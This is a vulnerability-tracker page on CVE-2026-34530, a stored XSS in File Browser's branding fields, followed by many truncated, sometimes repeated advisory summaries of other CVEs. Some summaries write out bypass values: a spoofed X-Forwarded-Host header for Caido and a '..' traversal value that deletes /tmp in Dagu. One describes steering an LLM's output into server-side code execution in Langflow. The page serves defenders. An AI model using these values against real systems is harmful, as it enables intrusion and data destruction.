CVE-2026-34530
published 2026-04-01CVE-2026-34530: File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version…
PriorityP429medium6.9CVSS 3.1
AVNACLPRHUIRSCCHILAN
EPSS
0.36%
27.5th percentile
File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the SPA index page in File Browser is vulnerable to Stored Cross-Site Scripting (XSS) via admin-controlled branding fields. An admin who sets branding.name to a malicious payload injects persistent JavaScript that executes for ALL visitors, including unauthenticated users. This issue has been patched in version 2.62.2.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| filebrowser | filebrowser | < 2.62.2 | 2.62.2 |
| github.com | filebrowser_filebrowser_v2 | >= 0 < 2.62.2 | 2.62.2 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
File Browser vulnerable to Stored Cross-site Scripting via text/template branding injection
ghsa·2026-03-31
CVE-2026-34530 [MEDIUM] CWE-79 File Browser vulnerable to Stored Cross-site Scripting via text/template branding injection
File Browser vulnerable to Stored Cross-site Scripting via text/template branding injection
### Summary
The SPA index page in File Browser is vulnerable to Stored Cross-site Scripting (XSS) via admin-controlled branding fields. An admin who sets `branding.name` to a malicious payload injects persistent JavaScript that executes for ALL visitors, including unauthenticated users.
### Details
`http/static.go` renders the SPA `index.html` using Go's `text/template` (NOT `html/template`) with custom delimiters `[{[` and `]}]`. Branding fields are inserted directly into HTML without any escaping:
```go
// http/static.go, line 16 — imports text/template instead of html/template
"text/template"
// http/static.go, line 33 — branding.Name passed into template data
"Name": d.settings.Branding.Nam
OSV
File Browser vulnerable to Stored Cross-site Scripting via text/template branding injection
osv·2026-03-31
CVE-2026-34530 [MEDIUM] File Browser vulnerable to Stored Cross-site Scripting via text/template branding injection
File Browser vulnerable to Stored Cross-site Scripting via text/template branding injection
### Summary
The SPA index page in File Browser is vulnerable to Stored Cross-site Scripting (XSS) via admin-controlled branding fields. An admin who sets `branding.name` to a malicious payload injects persistent JavaScript that executes for ALL visitors, including unauthenticated users.
### Details
`http/static.go` renders the SPA `index.html` using Go's `text/template` (NOT `html/template`) with custom delimiters `[{[` and `]}]`. Branding fields are inserted directly into HTML without any escaping:
```go
// http/static.go, line 16 — imports text/template instead of html/template
"text/template"
// http/static.go, line 33 — branding.Name passed into template data
"Name": d.settings.Branding.Nam
No detection rules found.
No public exploits indexed.
Wiz
CVE-2026-24853 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-24853 [HIGH] CVE-2026-24853 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24853 :
Homebrew vulnerability analysis and mitigation
Caido is a web security auditing toolkit. Prior to 0.55.0, Caido blocks non whitelisted domains to reach out through the 8080 port, and shows Host/IP is not allowed to connect to Caido on all endpoints. But this is bypassable by injecting a X-Forwarded-Host: 127.0.0.1:8080 header. This vulnerability is fixed in 0.55.0.
Source : NVD
## 9.8
Score
Published February 13, 2026
Severity CRITICAL
CNA Score 8.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
caido
Sources
NVD
Homebrew Severity CRITICAL Has Fix Added at:
Wiz
CVE-2025-9293 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2025-9293 [HIGH] CVE-2025-9293 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-9293 :
Homebrew vulnerability analysis and mitigation
A vulnerability in the certificate validation logic may allow applications to accept untrusted or improperly validated server identities during TLS communication. An attacker in a privileged network position may be able to intercept or modify traffic if they can position themselves within the communication channel. Successful exploitation may compromise confidentiality, integrity, and availability of application data.
Source : NVD
## 7.7
Score
Published February 13, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.1
Exploitation Probability (EPSS) N/A
Aff
Wiz
CVE-2026-33542 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.7
CVE-2026-33542 [MEDIUM] CVE-2026-33542 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33542 :
Homebrew vulnerability analysis and mitigation
Incus is a system container and virtual machine manager. Prior to version 6.23.0, a lack of validation of the image fingerprint when downloading from simplestreams image servers opens the door to image cache poisoning and under very narrow circumstances exposes other tenants to running attacker controlled images rather than the expected one. Version 6.23.0 patches the issue.
Source : NVD
## 5.7
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 5.7
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
Wiz
CVE-2026-24409 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-24409 [HIGH] CVE-2026-24409 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24409 :
Homebrew vulnerability analysis and mitigation
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior and Null Pointer Deference in CIccTagXmlFloatNum<>::ParseXml(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2.
Source : NVD
## 8.8
Score
Published January 24, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV
Wiz
CVE-2026-29180 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.9
CVE-2026-29180 [MEDIUM] CVE-2026-29180 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29180 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. Prior to 4.81.1, a broken access control vulnerability in Fleet's host transfer API allows a team maintainer to transfer hosts from any team into their own team, bypassing team isolation boundaries. Once transferred, the attacker gains full control over the stolen hosts, including the ability to execute scripts with root privileges. Version 4.81.1 patches the issue.
Source : NVD
## 4.9
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 4.9
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.1
Exploitation Probability (EPSS) N/A
Affect
Wiz
CVE-2025-66042 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-66042 [MEDIUM] CVE-2025-66042 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66042 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2025-68952 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2025-68952 [CRITICAL] CVE-2025-68952 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68952 :
Homebrew vulnerability analysis and mitigation
Eigent is a multi-agent Workforce. In version 0.0.60, a 1-click Remote Code Execution (RCE) vulnerability has been identified in Eigent. This vulnerability allows an attacker to execute arbitrary code on the victim's machine or server through a specific interaction (1-click). This issue has been patched in version 0.0.61.
Source : NVD
## 9.3
Score
Published December 27, 2025
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 59.4
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
eigent
Sources
NVD
Homebrew Severity CRITICAL No Fix Added
Wiz
CVE-2025-66633 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-66633 [MEDIUM] CVE-2025-66633 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66633 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-33711 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-33711 [MEDIUM] CVE-2026-33711 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33711 :
Homebrew vulnerability analysis and mitigation
protected_symlinks
Source : NVD
## 4.7
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
incus
github.com/lxc/incus/v6
Sources
NVD
Debian 13 Severity LOW No Fix Added at: Mar 29, 2026
Debian 14 Severity LOW Has Fix Added at: Mar 29, 2026
Echo Severity HIGH No Fix Added at: Mar 29, 2026
GoLang Severity MEDIUM Has Fix Added at: Mar 29, 2026
Homebrew Severity HIGH Has Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prior
Wiz
CVE-2025-64776 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-64776 [MEDIUM] CVE-2025-64776 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-64776 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-34453 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-34453 [HIGH] CVE-2026-34453 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34453 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to version 3.6.2, the publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, /api/bookmark/getBookmark filters bookmark results by calling FilterBlocksByPublishAccess(nil, ...). Because the filter treats a nil context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as Protected. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked. This issue has been patched in version 3.6.2.
Source :
Wiz
CVE-2026-33873 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-33873 [CRITICAL] CVE-2026-33873 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33873 :
Homebrew vulnerability analysis and mitigation
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assistant feature in Langflow executes LLM-generated Python code during its validation phase. Although this phase appears intended to validate generated component code, the implementation reaches dynamic execution sinks and instantiates the generated class server-side. In deployments where an attacker can access the Agentic Assistant feature and influence the model output, this can result in arbitrary server-side Python execution. Version 1.9.0 fixes the issue.
Source : NVD
## 9.3
Score
Published March 27, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Homebrew
LangFlow
Has Public Expl
Wiz
CVE-2026-21494 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-21494 [MEDIUM] CVE-2026-21494 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21494 :
Homebrew vulnerability analysis and mitigation
CIccTagLut8::Validate()
Source : NVD
## 7.1
Score
Published January 6, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-347
Wiz
CVE-2026-25059 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-25059 [HIGH] CVE-2026-25059 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25059 :
Homebrew vulnerability analysis and mitigation
OpenList Frontend is a UI component for OpenList. Prior to 4.1.10, the application contains path traversal vulnerability in multiple file operation handlers in server/handles/fsmanage.go. Filename components in req.Names are directly concatenated with validated directories using stdpath.Join. This allows ".." sequences to bypass path restrictions, enabling users to access other users' files within the same storage mount and perform unauthorized actions such as deletion, renaming, or copying of files. An authenticated attacker can bypass directory-level authorisation by injecting traversal sequences into filename components, enabling unauthorised file removal and copying across user boundaries within the same storage mount
Wiz
CVE-2026-23953 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-23953 [HIGH] CVE-2026-23953 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23953 :
Homebrew vulnerability analysis and mitigation
Incus is a system container and virtual machine manager. In versions 6.20.0 and below, a user with the ability to launch a container with a custom YAML configuration (e.g a member of the ‘incus’ group) can create an environment variable containing newlines, which can be used to add additional configuration items in the container’s lxc.conf due to newline injection. This can allow adding arbitrary lifecycle hooks, ultimately resulting in arbitrary command execution on the host. Exploiting this issue on IncusOS requires a slight modification of the payload to change to a different writable directory for the validation step (e.g /tmp). This can be confirmed with a second container with /tmp mounted from the host (A privilege
Wiz
CVE-2026-21504 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-21504 [MEDIUM] CVE-2026-21504 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21504 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to heap buffer overflow in the ToneMap parser. This issue has been patched in version 2.3.1.2.
Source : NVD
## 7.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 6.6
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 12, 2026
## Get a CVE risk assessment
Wiz
CVE-2026-31793 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-31793 [MEDIUM] CVE-2026-31793 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31793 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a segmentation fault due to invalid/wild pointer read in CIccCalculatorFunc::ApplySequence() causing denial of service. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 5.5
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
G
Wiz
CVE-2026-21685 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-21685 [HIGH] CVE-2026-21685 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21685 :
Homebrew vulnerability analysis and mitigation
CIccTagLut16::Read()
Source : NVD
## 7.1
Score
Published January 7, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-3475
Wiz
CVE-2026-22793 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
CVE-2026-22793 [CRITICAL] CVE-2026-22793 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22793 :
Homebrew vulnerability analysis and mitigation
5ire is a cross-platform desktop artificial intelligence assistant and model context protocol client. Prior to version 0.15.3, an unsafe option parsing vulnerability in the ECharts Markdown plugin allows any user able to submit ECharts code blocks to execute arbitrary JavaScript code in the renderer context. This can lead to Remote Code Execution (RCE) in environments where privileged APIs (such as Electron’s electron.mcp) are exposed, resulting in full compromise of the host system. Version 0.15.3 patches the issue.
Source : NVD
## 9.6
Score
Published January 21, 2026
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA
Wiz
CVE-2026-22689 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-22689 [MEDIUM] CVE-2026-22689 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22689 :
Homebrew vulnerability analysis and mitigation
Mailpit is an email testing tool and API for developers. Prior to version 1.28.2, the Mailpit WebSocket server is configured to accept connections from any origin. This lack of Origin header validation introduces a Cross-Site WebSocket Hijacking (CSWSH) vulnerability. An attacker can host a malicious website that, when visited by a developer running Mailpit locally, establishes a WebSocket connection to the victim's Mailpit instance (default ws://localhost:8025). This allows the attacker to intercept sensitive data such as email contents, headers, and server statistics in real-time. This issue has been patched in version 1.28.2.
Source : NVD
## 6.5
Score
Published January 10, 2026
Severity MEDIUM
CNA Score 6.5
Af
Wiz
CVE-2026-31886 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-31886 [CRITICAL] CVE-2026-31886 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31886 :
Homebrew vulnerability analysis and mitigation
Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, the dagRunId request field accepted by the inline DAG execution endpoints is passed directly into filepath.Join to construct a temporary directory path without any format validation. Go's filepath.Join resolves .. segments lexically, so a caller can supply a value such as ".." to redirect the computed directory outside the intended /tmp/ / path. A deferred cleanup function that calls os.RemoveAll on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to. With dagRunId set to "..", the resolved directory is the system temporary directory (/tmp on Linux). On non-root deployment
Wiz
CVE-2025-63390 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-63390 [MEDIUM] CVE-2025-63390 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-63390 :
Homebrew vulnerability analysis and mitigation
An authentication bypass vulnerability exists in AnythingLLM v1.8.5 in via the /api/workspaces endpoint. The endpoint fails to implement proper authentication checks, allowing unauthenticated remote attackers to enumerate and retrieve detailed information about all configured workspaces. Exposed data includes: workspace identifiers (id, name, slug), AI model configurations (chatProvider, chatModel, agentProvider), system prompts (openAiPrompt), operational parameters (temperature, history length, similarity thresholds), vector search settings, chat modes, and timestamps.
Source : NVD
## 5.3
Score
Published December 18, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Homebrew
AnythingLLM
Has Public Exp
Wiz
CVE-2026-31792 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-31792 [HIGH] CVE-2026-31792 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31792 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a null pointer dereference in CIccTagXmlStruct::ParseTag() causing a segmentation fault or denial of service. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 7.8
Score
Published March 10, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritiz
Wiz
CVE-2026-32767 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-32767 [CRITICAL] CVE-2026-32767 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32767 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Versions 3.6.0 and below contain an authorization bypass vulnerability in the /api/search/fullTextSearchBlock endpoint. When the method parameter is set to 2, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user — including those with the Reader role — to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application's database. This is inconsistent with the application's own security model: the dedicated SQL endpoint (/api/query/sql) correctly requires both CheckAdminRole and CheckReadonly middleware, b
Wiz
CVE-2025-66869 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-66869 [HIGH] CVE-2025-66869 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66869 :
Homebrew vulnerability analysis and mitigation
Buffer overflow vulnerability in function strcat in asan_interceptors.cpp in libming 0.4.8.
Source : NVD
## 7.5
Score
Published December 29, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libming
Sources
NVD
Homebrew Severity HIGH No Fix Added at: Jan 19, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Wiz
CVE-2026-21499 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-21499 [MEDIUM] CVE-2026-21499 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21499 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the XML parser. This issue has been patched in version 2.3.1.2.
Source : NVD
## 5.5
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 12, 2026
## Get a CVE risk assessme
Wiz
CVE-2026-27486 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-27486 [MEDIUM] CVE-2026-27486 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27486 :
Homebrew vulnerability analysis and mitigation
OpenClaw is a personal AI assistant. In versions 2026.2.13 and below of the OpenClaw CLI, the process cleanup uses system-wide process enumeration and pattern matching to terminate processes without verifying if they are owned by the current OpenClaw process. On shared hosts, unrelated processes can be terminated if they match the pattern. The CLI runner cleanup helpers can kill processes matched by command-line patterns without validating process ownership. This issue has been fixed in version 2026.2.14.
Source : NVD
## 4.3
Score
Published February 21, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA
Wiz
CVE-2026-22808 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-22808 [MEDIUM] CVE-2026-22808 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22808 :
Homebrew vulnerability analysis and mitigation
fleetdm/fleet is open source device management software. Prior to versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3, if Windows MDM is enabled, an unauthenticated attacker can exploit this XSS vulnerability to steal a Fleet administrator's authentication token (FLEET::auth_token) from localStorage. This could allow unauthorized access to Fleet, including administrative access, visibility into device data, and modification of configuration. Versions 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 fix the issue. If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM.
Source : NVD
## 5.5
Score
Published January 21, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
H
Wiz
CVE-2026-27485 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2026-27485 [MEDIUM] CVE-2026-27485 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27485 :
Homebrew vulnerability analysis and mitigation
OpenClaw is a personal AI assistant. In versions 2026.2.17 and below, skills/skill-creator/scripts/package_skill.py (a local helper script used when authors package skills) previously followed symlinks while building .skill archives. If an author runs this script on a crafted local skill directory containing symlinks to files outside the skill root, the resulting archive can include unintended file contents. If exploited, this vulnerability can lead to potential unintentional disclosure of local files from the packaging machine into a generated .skill artifact, but requires local execution of the packaging script on attacker-controlled skill contents. This issue has been fixed in version 2026.2.18.
Source : NVD
## 4.6
Wiz
CVE-2026-2657 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-2657 [MEDIUM] CVE-2026-2657 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2657 :
Homebrew vulnerability analysis and mitigation
A vulnerability has been found in wren-lang wren up to 0.4.0. This impacts the function printError of the file src/vm/wren_compiler.c of the component Error Message Handler. Such manipulation leads to stack-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published February 18, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS
Wiz
CVE-2026-31796 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-31796 [HIGH] CVE-2026-31796 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31796 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow in icCurvesFromXml() causing heap memory corruption or crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 7.8
Score
Published March 10, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in
Wiz
CVE-2026-32940 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-32940 [CRITICAL] CVE-2026-32940 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32940 :
Homebrew vulnerability analysis and mitigation
